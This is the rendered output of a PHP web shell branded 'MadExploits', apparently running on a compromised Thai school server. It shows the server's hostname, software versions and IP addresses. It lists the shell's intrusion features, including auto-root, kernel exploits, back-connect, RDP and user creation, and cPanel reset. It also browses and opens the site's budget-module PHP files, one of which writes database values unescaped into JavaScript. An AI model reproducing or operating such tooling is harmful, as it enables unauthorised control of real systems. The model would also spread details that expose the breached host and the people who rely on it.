Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss_test /
modules /
budget /
category /
[ HOME SHELL ]
Name
Size
Permission
Action
ajax_type.php
862
B
-rw-r--r--
ajax_type2.php
836
B
-rw-r--r--
edit_category.php
1.37
KB
-rw-r--r--
edit_type.php
15.1
KB
-rw-r--r--
key_activity.php
11.02
KB
-rw-r--r--
money_source.php
11.05
KB
-rw-r--r--
pay_type.php
11.65
KB
-rw-r--r--
plan_project.php
10.85
KB
-rw-r--r--
proj_product.php
11.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ajax_type2.php
<?php ob_start(); include("../../../amssplus_connect.php"); foreach($_GET as $system_key => $system_key_val) { $_GET["$system_key"] =mysqli_real_escape_string($connect,$system_key_val); } $type_id=$_GET['pj_activity']; $js = "removeOption2();"; $js .= " var opt = new Option('เลือก', ''); document.getElementById('item2').options[0] = opt; "; $i=1; $sql = "select * from budget_list where type_id='$type_id' "; $dbquery = mysqli_query($connect,$sql); While ($result = mysqli_fetch_array($dbquery)) { $list_id = $result['list_id']; $list_name = $result['list_name']; $js .= " var opt = new Option('$list_name', '$list_id'); document.getElementById('item2').options[$i] = opt; "; $i++; } header("Content-Type:text/javascript; charset=utf-8"); echo $js; ?>
Close